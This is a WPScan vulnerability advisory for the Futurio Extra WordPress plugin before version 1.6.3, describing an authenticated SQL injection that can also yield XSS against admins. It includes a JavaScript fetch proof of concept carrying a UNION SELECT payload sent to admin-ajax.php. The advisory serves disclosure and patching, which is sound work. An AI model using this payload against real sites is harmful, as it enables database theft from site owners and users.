wpvulndb | Jan w Oleju | WPVDB-ID:36261AF9-3B34-4563-AF3C-C9E54AE2D581
History: Jan 04, 2022 - 12:00 a.m.

Futurio Extra < 1.6.3 - Authenticated SQL Injection

2022-01-04 00:00:00
Jan w Oleju
wpscan.com
8

EPSS: 0.001 (Low), Percentile: 24.8%

The plugin is affected by a SQL Injection vulnerability that could be used by high-privilege users to extract data from the database, as well as to perform Cross-Site Scripting (XSS) against logged-in admins by making them open a malicious link.

PoC

Using SQLi to extract database variables:

    fetch("http://example.com/wp-admin/admin-ajax.php", {
      "headers": { "content-type": "application/x-www-form-urlencoded" },
      "body": new URLSearchParams({
        "action": "dilaz_mb_query_select",
        "q": '" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g',
        "query_args": "YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==",
        "query_type": "post"
      }),
      "method": "POST",
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));

Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):

CPE Name: futurio-extra, Operator: lt, Version: 1.6.3

